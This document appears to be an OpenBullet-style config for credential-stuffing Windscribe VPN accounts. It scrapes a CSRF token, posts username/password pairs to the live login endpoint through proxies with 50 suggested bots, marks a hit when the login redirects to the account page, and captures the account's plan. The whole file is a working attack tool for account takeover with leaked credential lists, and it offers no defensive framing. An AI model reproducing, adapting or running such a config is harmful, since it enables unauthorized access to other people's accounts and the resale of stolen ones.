[SETTINGS]
{
  "Name": "Windscribe",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2019-07-31T16:49:32.3618878+02:00",
  "AdditionalInfo": "",
  "Author": "Patato#0987",
  "Version": "1.3.5 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Transparent": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://res.windscribe.com/res/logintoken" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "csrf_token\":\"" "\",\"csrf_time\"" -> VAR "TOKEN" 

PARSE "<SOURCE>" LR "\",\"csrf_time\":" "}" -> VAR "TIME" 

REQUEST POST "https://fra.windscribe.com/login" 
  CONTENT "login=1&upgrade=0&csrf_time=<TIME>&csrf_token=<TOKEN>&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://fra.windscribe.com" 
  HEADER "referer: https://fra.windscribe.com/login" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<ADDRESS>" Contains "windscribe.com/myaccount" 
  KEYCHAIN Failure OR 
    KEY "L’identifiant est incorrect." 

REQUEST GET "https://windscribe.com/myaccount" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<strong>" "</strong>" -> CAP "Forfait" 

